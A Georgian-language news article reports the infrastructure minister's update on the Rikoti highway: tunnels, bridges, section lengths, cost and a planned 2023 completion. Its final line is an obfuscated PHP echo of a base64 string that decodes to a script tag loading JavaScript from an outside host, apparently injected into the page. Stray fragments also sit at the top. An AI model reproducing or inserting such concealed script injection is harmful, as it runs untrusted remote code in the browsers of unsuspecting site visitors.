celsiusi
ავერსი შნაიდერი

რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრი ირაკლი ქარსელაძე აცხადებს, რომ რიკოთის ახალი გზის რამდენიმე მონაკვეთი წელს გაიხსნება.

„რიკოთის მაგისტრალური გზის მშენებლობა ნამდვილად საუკუნის პროექტია და აღმოსავლეთ-დასავლეთის საერთაშორისო საგზაო დერეფნის ყველაზე გამომწვევი და მნიშვნელოვანი მონაკვეთია. სამუშაოები ყველა გვირაბზე გეგმის შესაბამისად მიმდინარეობს. გვაქვს დასრულებული გვირაბები, რომლითაც უკვე ვსარგებლობთ. გვირაბების ნახევარი კი უკვე გაჭრილია და შესაბამისი მოსახვითი სამუშაოები ხორციელდება. ასევე, კარგი პროგრესია ხიდებთან მიმართებაშიც – მიმდინარეობს ყველაზე გრძელი, უნიკალური მეტალის ხიდის მონტაჟი“, – განაცხადა ირაკლი ქარსელაძემ რიკოთის მაგისტრალური გზის სამშენებლო სამუშაოების დათვალიერების შემდეგ.

რიკოთის ოთხზოლიანი ჩქაროსნული მაგისტრალური გზის მშენებლობა აქტიურად გრძელდება. უკვე გაჭრილია 24 გვირაბი, საიდანაც სამი დასრულებული გვირაბით სატრანსპორტო საშუალებები უკვე სარგებლობენ. სამუშაოები პარალელურად მიმდინარეობს 88 ხიდზე, საიდანაც 30 უკვე აშენებულია, ხოლო 6 დასრულებულ ხიდზე მოძრაობა გახსნილია.

რიკოთის საუღელტეხილო მონაკვეთის მშენებლობა ოთხ მონაკვეთად არის დაყოფილი: ჩუმათელეთი-ხევის 11.6 კმ-იან, ხევი-უბისას 12,2 კმ-იან, უბისა-შორაპანის 13 კმ-იან და შორაპანი-არგვეთას 14,7კმ-იან მონაკვეთებად. საერთო ჯამში, რიკოთზე დაგეგმილია 52 კმ-მდე გზის, 97 ხიდისა და 51 გვირაბის მშენებლობა.

„ეს გზა მნიშვნელოვანია იმ საერთაშორისო დერეფნის თვალსაზრისით, რომელსაც შუა დერეფანი ჰქვია და რომელიც არსებული მოცემულობის და უკრაინაში მიმდინარე ომის პირობებში, კიდევ უფრო აქტუალური ხდება. რა თქმა უნდა, ახალი გზის პირობებში აღმოსავლეთ-დასავლეთის საგზაო დერეფანი კიდევ უფრო მიმზიდველი იქნება საერთაშორისო გადაზიდვებისთვის და ძალიან მნიშვნელოვან როლს იქონიებს ქვეყნის ეკონომიკური ზრდის კუთხით“, – განაცხადა ირაკლი ქარსელაძემ.

რიკოთის საგზაო მონაკვეთი აღმოსავლეთ-დასავლეთის საერთაშორისო მაგისტრალის (E 60-ის) ერთ-ერთი მნიშვნელოვანი ნაწილია. მისი თანამედროვე სტანდარტის ოთხზოლიან ჩქაროსნულ მაგისტრალად მოდერნიზება გაზრდის გზის გამტარუნარიანობასა და სატრანზიტო ტვირთბრუნვას. ამასთან, მნიშვნელოვნად გაუმჯობესდება ავტოტრანსპორტის მოძრაობის უსაფრთხოების ხარისხი, ხოლო მგზავრობის დრო საგრძნობლად შემცირდება. ამ დროისთვის, რიკოთზე გადაადგილების დასაშვები სიჩქარე 60 კმ/სთ-ია, მშენებლობის დასრულების შემდეგ გადაადგილების დასაშვები სიჩქარე გაიზრდება, რიგ მონაკვეთებზე კი თითქმის გაორმაგდება.

ახალი გზა ითვალისწინებს საგზაო უსაფრთხოების ყველა თანამედროვე სტანდარტს. რიკოთის უღელტეხილზე სამუშაოები პანდემიის პერიოდშიც არ გაჩერებულა. მაგისტრალის 2 კმ-იან ორ ზოლიან, ხევი-უბისას მონაკვეთზე ავტოტრანსპორტის მოძრაობა 2021 წლის სექტემბერში გაიხსნა.

რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის თქმით, რიკოთის საუღელტეხილო ახალი გზის კონკრეტული მონაკვეთები უკვე წელს გაიხსნება, ხოლო სრულად რიკოთის ახალი მაგისტრალური გზის მშენებლობა 2023 წელს დასრულდება.

რიკოთის საუღელტეხილო გზის მშენებლობის პროექტი სურამში, შროშასა და ზესტაფონში, მაგისტრალის მიმდებარე სოფლების მოსახლეობისთვის საკუთარი ნაწარმის რეალიზაციისთვის სპეციალური სივრცეების მოწყობასაც ითვალისწინებს.

რიკოთის საუღელტეხილო მონაკვეთის სამშენებლო სამუშაოების ჯამური ღირებულება 2.6 მილიარდ ლარამდეა. რიკოთის პროექტებზე ამჟამად დასაქმებულია 4 000-ზე მეტი ადამიანი და დასაქმებულთა დაახლოებით 68% საქართველოს მოქალაქეა.

693
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");